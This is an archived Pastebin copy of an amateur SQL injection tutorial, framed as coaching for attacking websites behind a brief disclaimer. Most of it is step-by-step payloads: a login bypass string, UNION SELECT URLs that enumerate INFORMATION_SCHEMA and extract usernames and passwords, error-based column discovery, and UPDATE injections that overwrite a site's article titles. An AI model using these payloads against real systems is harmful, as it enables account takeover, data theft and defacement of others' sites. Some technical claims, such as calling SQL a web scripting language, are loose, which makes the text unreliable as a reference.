Advertisement
BaSs_HaXoR

SQL Injection Tutorial

Sep 7th, 2013
1,116
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 21.23 KB | None | 0 0
  1.  
  2. SQL injection
  3.  
  4. Uncommon SQL Injection
  5. Foreword:
  6. The Uncommon SQL Injection white paper is, as promised by the title, virtually
  7. unlike any other SQL injection walk through on the web. This written lesson aims to not
  8. only provide a comprehensive reference, and to serve as a learning aid, but also to help
  9. those who have searched the internet high and low for an SQL injection paper that is of
  10. real use. I have found that a majority, if not all, of the SQL injection guides that I have
  11. read in the past (and I have read many in my day) are teeming with typographical errors,
  12. poor displays of grammatical skills, astonishingly complex words that the author himself
  13. barely understands, or do not cover certain techniques that are necessary to use when
  14. performing an injection on a real website. Grasping this subject can be tricky enough
  15. without having to decipher what you are reading before you can understand it.
  16. Fortunately, this is not an average SQL injection paper, and I realize that you don’t need
  17. another step between you and learning how to SQL inject. I hope you enjoy this
  18. uncommonly easy to read and apply paper on SQL injections.
  19. *Disclaimer:
  20. The information in this article is strictly for educational purposes only. Practicing the techniques
  21. described below on a machine other than your own is prohibited by law unless you are given express
  22. consent to do so from the administrator of the system on which you will perform the attack(s). The author
  23. of this article cannot be held responsible for your actions. Please use your knowledge maturely and
  24. responsibly.*
  25. SQL and Its Use:
  26. -SQL is a web scripting (computer) language.
  27. -SQL is used to make websites.
  28. -SQL stands for Structured Query Language.
  29. -SQL is used to insert, display and store information from a website on a server.
  30. Tables:
  31. -In an SQL database there are tables which store information.
  32. -Tables can store any information on a website, ranging from usernames,
  33. passwords, and addresses, to text displayed on a webpage, such as a link or page
  34. header.
  35. -Tables have columns in which the records (information) are kept.
  36. -Each table has a name and each column has a name.
  37. -SQL injection means to modify one or more of these tables.
  38. *Figure A below shows an example table*
  39. The table’s name is “Names” and its columns’ names are “FIRST” and “LAST.”
  40. This table is storing the names of people; there are two total records, “John Doe” and
  41. “Jane Smith”
  42. -Figure A-
  43. Names
  44. __________________
  45. |_FIRST_|_LAST____|
  46. |_John___|__Doe____ |
  47. |_Jane___|__Smith___|
  48. Vulnerabilities:
  49. -SQL injection vulnerabilities come in two main forms.
  50. -Both forms involve injecting SQL code into a website.
  51. -To “inject SQL code” means to “write SQL language”.
  52. -By writing SQL language into the site, the website will do what you tell it to do,
  53. and you will be able to achieve your goals.
  54. - (1) Injecting into a form. Such as username and password boxes on a login page.
  55. - (2) Injecting into a URL. Like www.site.com/news.asp?ArticleID=10.
  56. Goals:
  57. -Your goal as an injector is to outsmart the SQL server.
  58. -By outsmarting the SQL server you may able to display information from the
  59. site’s tables on your screen.
  60. -You may also be able to add and delete information from the tables.
  61. -In addition, you may be able to bypass certain security measures, like logging in
  62. to a site without knowing a real username and password.
  63. How SQL Works:
  64. -Before you can perform an injection, you must first understand how SQL works.
  65. -When you register a new username and password on a website, the username and
  66. password you entered is kept in the site’s member table; the username and
  67. password are put in their separate columns.
  68. -When you log in with the username and password you registered, the login page
  69. looks for a row in the member table that has the same username and password that
  70. you supplied.
  71. -The login form takes the conditions that you supply, and searches the member
  72. table for any rows that satisfy those conditions.
  73. -If a row exists that has both the same username and password, then you are
  74. allowed to go on your account.
  75. -If no row is found, the login page will tell you that the account you specified
  76. does not exist, or that your username and password is wrong.
  77. -SQL can also display information on a website.
  78. -If a site has a news section, there may be an SQL table that, for example, holds
  79. all of the article names.
  80. -More often than not, articles on a website are identified by a number.
  81. -When you click on a link to an article, you are usually able to see the number of
  82. the article you clicked on by looking at the URL of the page you are on.
  83. *For the next three bullets, please refer to figure B below*
  84. -When you click a link like this, www.site.com/news.asp?ArticleID=10, the link
  85. tells the site to look in the table that stores the article names for an article who’s
  86. “ArticleID” is 10.
  87. -Once the website has found this column in the table, it may look for a column
  88. named “Title” in the same row and display this value as the article’s title on your
  89. screen.
  90. -In this case, “Cats” is what you would ultimately see on your screen as the title of
  91. the article.
  92. -It is important to realize that what is typed after the “=” sign in the URL is part of
  93. an SQL command; please keep this in mind as you continue reading.
  94. -Figure B-
  95. Article_Name
  96. ____________________
  97. |_Article_ID_|__Title___|
  98. |____10_____|__Cats___|
  99. |____11_____|__Dogs__ |
  100. |____12_____|__Cows__|
  101. Commands:
  102. (a) What They Are and What to Look for:
  103. -By typing certain words called commands, you are able to tell the SQL server
  104. (the website) what you want to do to a specific table, column, or record.
  105. -In a command, you must specify what you want to do and to what you want to do
  106. it.
  107. -If you are injecting into a URL (link) you place your command after the “=” sign
  108. in the URL.
  109. -If you are injecting into a form, such as a login form, put your command(s) in the
  110. boxes where you would normally type your username and password.
  111. -The website will read what you type and treat it as a command and will do
  112. whatever you tell it to do.
  113. -The possibilities are virtually endless; some examples are reading, changing and
  114. adding usernames and passwords on a website, and changing the words on the
  115. pages of the website.
  116. (b) Familiarization and Syntax
  117. :
  118. -The manner in which you write commands is called syntax.
  119. -You must use the right syntax in order for the SQL server to understand what
  120. you want it to do.
  121. -Familiarize yourself with the following commands, and use them throughout this
  122. paper and during real world SQL injections.
  123. -Do not worry about correct syntax yet. You will come to learn and eventually
  124. memorize it, as you practice and study examples later on in this paper.
  125. -Memorization through understanding will benefit you in the long run.
  126. -You will see a language, not just words on a screen.
  127. -Not all commands that you will see and use will be listed below.
  128. -You will soon see other (somewhat confusing) commands, know what they do
  129. and how to use them, but probably not understand why they work.
  130. -For the sake of simplicity, those commands and their uses have been omitted
  131. from the following list.
  132. COMMAND QUICK REFERENCE CHART
  133. COMMAND
  134. |
  135. USE
  136. __________________________________________________________________
  137. ORDER BY – Tells the website which column to display
  138. first on the webpage that you are currently
  139. viewing.
  140. SELECT – Specifies certain information in a table.
  141. UPDATE – Changes existing information in a column of
  142. a table.
  143. AND – Both conditions must be true in order for a
  144. a command to be carried out.
  145. OR – Only one condition must be true in order for
  146. a command to be carried out.
  147. – (Two dashes) – Ends your series of commands.
  148. + – Use the plus sign instead of a space.
  149. Form Injection:
  150. -The easiest SQL injection to perform is called “Authorization Bypass.”
  151. -”Authorization Bypass” refers to SQL injecting into the boxes where you enter
  152. your username and password on a website, a.k.a., a login form.
  153. -As you may recall, in the “How SQL Works” section, login pages check to see if
  154. the information that you supplied is a true statement that will return any rows
  155. from the member table.
  156. -We must trick the website into thinking that we have supplied a correct username
  157. and password by making it return at least one row.
  158. -The username and password boxes are each surrounded by invisible single
  159. quotes.
  160. -Whatever is surrounded by the invisible single quotes when the form is submitted
  161. is what the site looks for in the member table.
  162. See Figure C
  163. -If you have an opening quotation mark in Authorization Bypass you must always
  164. put a closing quotation mark or else you will get an error.
  165. -For example, if you submit z’ (the letter z followed by a single quote) an error
  166. will occur because there is an unclosed quotation mark.
  167. See Figure D
  168. -It is important to remember that there are two invisible quotation marks already
  169. surrounding each box that you type in.
  170. -Now, let’s try submitting the following z’ OR ‘x’='x.
  171. -In plain English, SQL aside, z’ OR ‘z’='z tells the server to look for any row with
  172. ‘z’ as the username in the member table or any row where the letter ‘x’ is the same
  173. as ‘x’. See Figure E
  174. -This is a true statement because in every row, table, column and language, the
  175. letter x is the same as the letter x.
  176. -According to the SQL server, this is a valid username because x is the same as x
  177. in every row.
  178. -As strange as it may look, you have satisfied the SQL server’s requirements,
  179. which are, make sure the username supplied exists in the member table.
  180. -Supply this as both the username and password, and you will be successfully
  181. logged in to the website.
  182. -Figure C-
  183. __________
  184. Username: ‘ |___Bob___| ‘
  185. -The username ‘Bob’ will be searched for in the member table.
  186. -Figure D-
  187. ___________
  188. Username: ‘ |___z’______| ‘
  189. -’z” (an opening quotation mark, the letter z, a closing single
  190. quotation mark, and an opening quotation mark) will be searched
  191. for in the member table.
  192. -This produces an error because the SQL server expects that for
  193. every opening quotation mark there will be a closing quotation
  194. mark.
  195. -Figure E-
  196. ___________
  197. Username: ‘ |z’_OR_’x'=’x| ‘
  198. -When you include the imaginary quotation marks shown above as single
  199. quotation marks outside of the box, the username being searched for looks
  200. like ‘z’ OR ‘x’='x’.
  201. -All opening quotation marks can be paired with a closing quotation mark
  202. and therefore this query will not return an error.
  203. -The username “z” may not exist but “x” is always equal to “x”.
  204. The INFORMATION_SCHEMA:
  205. -The “INFORMATION_SCHEMA” holds the names of every table and column
  206. on a site.
  207. -On every SQL server there will be an “INFORMATION_SCHEMA” and its
  208. name will never change.
  209. -The table in the “INFORMATION_SCHEMA” that holds the names of all the
  210. other tables is called “INFORMATION_SCHEMA.TABLES.”
  211. -The name of the column that holds the information in
  212. “INFORMATION_SCHEMA.TABLES” is called “table_name.”
  213. -The table in the “INFORMATION_SCHEMA” that holds the names of all the
  214. other columns is called “INFORMATION_SCHEMA.COLUMNS.”
  215. -The name of the column that holds the information in
  216. “INFORMATION_SCHEMA.COLUMNS” is called “column_name.”
  217. URL Injection:
  218. -Good News: Now the real fun begins!
  219. -You will learn how to read and modify information stored in tables by finding
  220. table and column names.
  221. -Bad News: You’ll have to make sure you understand the “Commands” section
  222. above (especially part b), reading it again can’t hurt.
  223. -In a link on a website you may find that there is an “=” sign.
  224. -In order to perform an SQL injection on this website, you will need to type
  225. commands after the “=” sign.
  226. -Simply start typing the commands after the equals sign and click “Go” in your
  227. web browser, as if you are going to a new website.
  228. -The simplest way to understand what you need to do is to see an example attack
  229. broken down into steps.
  230. -The example URL on which we will perform example attacks will be
  231. www.site.com/news.asp?ArticleID=10.
  232. -The following examples will demonstrate two common attacks on vulnerable
  233. websites.
  234. Attack 1
  235. GOAL: Obtain a username and password.
  236. Vulnerable URL: www.site.com/news.asp?ArticleID=10
  237. STEP 1: Determine if link is vulnerable.
  238. a. www.site.com/news.asp?ArticleID=10+AND+1=0–
  239. -Command Translation: Display article 10 only if the number 1 is the same as the
  240. number 0.
  241. -In this case, the “AND” command means that in order for the article to be shown,
  242. article 10 must exist AND 1 must equal 0.
  243. -This should cause the article to not load because 1 is not the same as 0.
  244. b. www.site.com/news.asp?ArticleID=10+AND+1=1–
  245. -Command Translation: Display article 10 only if the number 1 is the same as the
  246. number 1.
  247. -The article should be shown on the page now because article 10 exists AND 1 is
  248. equal to 1.
  249. *Since the article loads when you want it to, and doesn’t load when you don’t want it to,
  250. our commands must be working! This means the link is vulnerable and we can continue!*
  251. STEP 2: Find total number of columns displayed on the page.
  252. a. www.site.com/news.asp?ArticleID=10+ORDER+BY+1–
  253. -”ORDER BY 1″ (where “1″ is the column number) tells the page to display the
  254. first column on the page first.
  255. -”ORDER BY 2″ would display the second column on the page first.
  256. b. Repeat step 2a, increasing the number “1″ by one each time until you receive an error.
  257. i. Stop when you get an error message, subtract one from this number and record
  258. it.
  259. -For example, if you receive an error when you reach the number “4″
  260. (www.site.com/news.asp?ArticleID=10+ORDER+BY+4–), subtract one
  261. from “4″ to get 3.
  262. ii. You have now discovered that there are 3 total columns on the page.
  263. STEP 3: Displaying table names.
  264. *Use the “The INFORMATION_SCHEMA” section as a reference for steps 3 and 4*
  265. a. www.site.com/news.asp?ArticleID=
  266. -1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES–
  267. -Command Reminder: “SELECT” tells the website to display the information that
  268. you specify from the table that you specify.
  269. -Notice: You must change the original article number (10) to negative one.
  270. -Notice: The final number from step 2b (in our case, 3) is correctly inserted into
  271. the above command by listing the number “1″ to the final number, separating each
  272. with a comma.
  273. -You should now see at least one of the numbers you have listed in the command
  274. above displayed somewhere on the webpage.
  275. -From here on, you may only replace numbers in the URL with other words if
  276. they have been displayed on the webpage.
  277. b. www.site.com/news.asp?ArticleID=
  278. -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES–
  279. -Reminder: You may replace any number that was displayed on the webpage
  280. (preferably only one of them) with “table_name.”
  281. -Command Translation: Show me the name of a table.
  282. -A table name, instead of one of the numbers (in our case the number “2″), should
  283. be displayed on the webpage.
  284. STEP 4: Find target table name.
  285. a. www.site.com/news.asp?ArticleID=
  286. -1+UNION+SELECT+1,table_name,3+FROM+INFORMATION_SCHEMA.TABLES+
  287. WHERE+table_name>’displayed_table’–
  288. -Odds are that the first displayed table_name is not the one you are looking for;
  289. you are looking for the table that stores usernames and passwords.
  290. -To navigate a table list to find the right table, add
  291. “+WHERE+table_name>’displayed_table’ ” (” ‘displayed_table’ ” = the wrong
  292. table name that is being shown) after “TABLES.”
  293. -Command Translation: Display the name of the next table in the list after
  294. ‘displayed_table.’
  295. b. Repeat step 4a until a reasonable name for a members table is displayed.
  296. -For our attack, let’s say we have found a table named “UserAccounts”
  297. c. Remember the table name from step 4b, write it down if necessary.
  298. STEP 5: Displaying column names.
  299. a. www.site.com/news.asp?ArticleID=
  300. -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_S
  301. CHEMA.COLUMNS+WHERE+table_name=’UserAccounts’–
  302. -Command Translation: Show me the names of the columns in the table
  303. “UserAccounts”
  304. -Now, instead of a table_name being displayed, you will see the name of a
  305. column in the table “UserAccounts” being displayed.
  306. STEP 6: Find target columns.
  307. a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,column_
  308. name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name=’User
  309. Accounts’+AND+column_name>’displayed_column’–
  310. -As in step 4, you will need to find the names of useful columns.
  311. -If you are looking for usernames and passwords, you should try to find columns
  312. named username, password, user, pass, login_name, etc…
  313. -Command Translation: Display the name of the next column in the list after
  314. ‘displayed_column.’
  315. b. Repeat step 6a until you find the right column names.
  316. -For our example attack, we will imagine that we have come across columns
  317. named “username” and “password”.
  318. c. Remember the column names from step 6b, write them down if necessary.
  319. STEP 7: Displaying records (finally!).
  320. *For this step, have available the table and column names which you have written down.*
  321. Table Name:
  322. “UserAccounts”
  323. Column Names: “username”
  324. “password”
  325. a. www.site.com/news.asp?ArticleID=-1+UNION+SELECT+1,username,3+
  326. FROM+UserAccounts–
  327. -Command Translation: Display the first record in the column “username” from
  328. the table “UserAccounts.”
  329. -Let’s say the webpage displays the username “Adam”
  330. b. www.site.com/news.asp?ArticleID=
  331. -1+UNION+SELECT+1,password,3+FROM+UserAccounts+WHERE
  332. +username=’Adam’–
  333. -Command Translation: Display the password for the username “Adam” that is
  334. stored in the table UserAccounts.
  335. -In our hypothetical attack, the webpage has displayed “neo.”
  336. c. You have found the password for the username “Adam”, which is “neo.”
  337. - Username: Adam
  338. -
  339. Password: neo
  340. You have just completed your first SQL injection attack!
  341. ===============================================================
  342. ATTACK 2
  343. GOAL: Alter text displayed on a webpage.
  344. Vulnerable URL: www.site.com/news.asp?ArticleID=10
  345. STEP 1: Find table and column name.
  346. a. www.site.com/news.asp?ArticleID=10+HAVING+1=1–
  347. -This command (“HAVING+1=1″) should cause an error to be shown.
  348. -The error message will look something like this:
  349. “Column ‘news.id’ is invalid in the select list because it is not contained in
  350. an aggregate function and there is no GROUP BY clause.”
  351. -Notice that the error message reveals the name of a table and a column.
  352. - “news.id” in the error message means that there is a column called “id” in the
  353. “news” table.
  354. STEP 2: Find a useful column name.
  355. a. www.site.com/news.asp?ArticleID=10+GROUP+BY+id+HAVING+1=1–
  356. -To show the next column name in the table, you add “GROUP+BY+first_column
  357. _name_displayed” before the command “HAVING.”
  358. -In this command, the “first_column_name_displayed” is “id”
  359. -This command produces another error message, this time the “id” part of
  360. “news.id” in the error message will change, and this is the next column name.
  361. -Let’s say that this time, the error message says “news.release”
  362. b. www.site.com/news.asp?ArticleID=10+GROUP+BY+id,release+HAVING+1=1–
  363. -To continue displaying column names, add a comma and the column name in the
  364. error message.
  365. i. The comma separated list can be as long as necessary, just keep adding
  366. commas and the column name in the current error message.
  367. -Now let’s say the error message shows us the column name “title”
  368. (“news.title”).
  369. -The article titles are probably stored in the column “title” and then
  370. displayed on the webpage.
  371. -If you can change the article titles in the column “title”, you will
  372. change what is ultimately displayed on the site.
  373. STEP 3: Changing the webpage.
  374. a. www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’sql injected’–
  375. -This will change all of the titles in the table news to “sql injected.”
  376. -Instead of the website displaying the original titles of the articles, all of the titles
  377. will say “sql injected.”
  378. -Be careful! This changes all of the titles. If you want to change one specific
  379. article title, proceed to step 3b.
  380. b. www.site.com/news.asp?ArticleID=10+UPDATE+news+set+title=’sql
  381. injected’+WHERE+id=10—
  382. -This will change only the title of article number 10 to “sql injected”
  383. -To change the title of a different article, simply replace the “10″ in “id=10″ to a
  384. different number.
  385. -For example, you can change “id=10″ to “id=8″, but to see the change you must
  386. go to “www.site.com/news.asp?ArticleID=8″.
  387. End of Attack 2
  388. ==============================================================
  389. Congratulations! You have now mastered the basics of SQL injection. I hope you have
  390. learned from this paper and are eager to learn more. Your learning certainly does not
  391. stop here. You will discover, grow curious, ask questions, and almost inevitably become
  392. frustrated. It will be easy to become exhausted and discouraged, but giving up never
  393. reveals the answers to your questions. Challenges are meant to be overcome. Take pride
  394. in overcoming them. Do not lose interest in your passion, whatever it may be. Thank you
  395. for reading the Uncommon SQL Injection white paper!
  396.  
  397. Credits To the following:
  398. http://www.n1tr0g3n.com/?page_id=2174
  399. “Persistence guards every problem’s solution.”
  400. ~N3T D3VIL~
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement